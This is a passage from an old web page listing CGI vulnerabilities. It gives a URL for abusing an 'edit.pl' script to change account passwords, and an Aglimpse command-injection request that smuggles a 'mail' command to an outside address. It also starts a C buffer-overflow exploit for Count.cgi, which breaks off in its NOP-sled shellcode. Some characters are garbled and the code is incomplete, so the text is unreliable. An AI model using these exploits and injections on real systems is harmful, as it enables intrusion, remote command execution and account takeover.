CGI Vulnerabilities (7)
submission) you could change the password on all of their accounts with a simple JavaScript function. Deep inside the web site authors still have the good old "edit.pl" script. It takes some time to reach it (unlike the path described) but you can reach it directly at: http://www.sitetracker.com/cgi-bin/edit.pl...ount=&password= (Posted: 2003:9:15 07:22:27) ---玟ζ玟
(2):
21. Vulnerability in Glimpse HTTP
telnet target.machine.com 80
GET /cgi-bin/aglimpse/80IFS=5;CMD=5mail5fyodor\@dhp.com\ HTTP/1.0
22. Count.cgi
This program only works against Count.cgi versions below 24:
/*### count.c ########################################################*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
/* Forwards */
unsigned long getsp(int);
int usage(char *);
void doit(char *,long, char *);
/* Constants */
char shell[]=
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"